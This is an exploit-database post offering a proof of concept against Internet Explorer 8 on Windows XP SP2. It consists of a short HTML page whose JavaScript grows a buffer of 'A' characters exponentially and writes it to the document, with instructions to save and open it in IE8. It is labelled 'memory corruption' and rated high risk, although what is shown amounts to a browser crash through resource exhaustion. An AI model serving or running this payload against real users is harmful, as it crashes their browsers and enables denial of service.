Internet Explorer 8.0.7600.16385 Memory Corruption PoC Exploit

2013-07-02 22:24:29
Inviato da: irist.ir

#################################

# Iranian Exploit DataBase

# http://exploit.iedb.ir

#################################

# Exploit Title : Internet Explorer 8.0.7600.16385 Memory Corruption PoC Exploit

# Author : Iranian Exploit DataBase

# Discovered By : IeDb

# Email : [email protected]

# Home : http://exploit.iedb.ir

# Security Risk : High

# Tested on : Windows Xp Sp2

#################################

Svae The Source To html And run on ie8 :

<html>
<head>
<script language="JavaScript">
{
var buffer = '\x41'
for(i=0; i <= 100 ; ++i)
{
buffer+=buffer+buffer
document.write(buffer);
}
}
</script>
</head>
</html>

Picture :

http://tinypic.com/view.php?pic=4iznlu&s=5

#################################


###########################

# Exploit Archive = http://iedb.ir/exploit/exploits-184.html

###########################

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.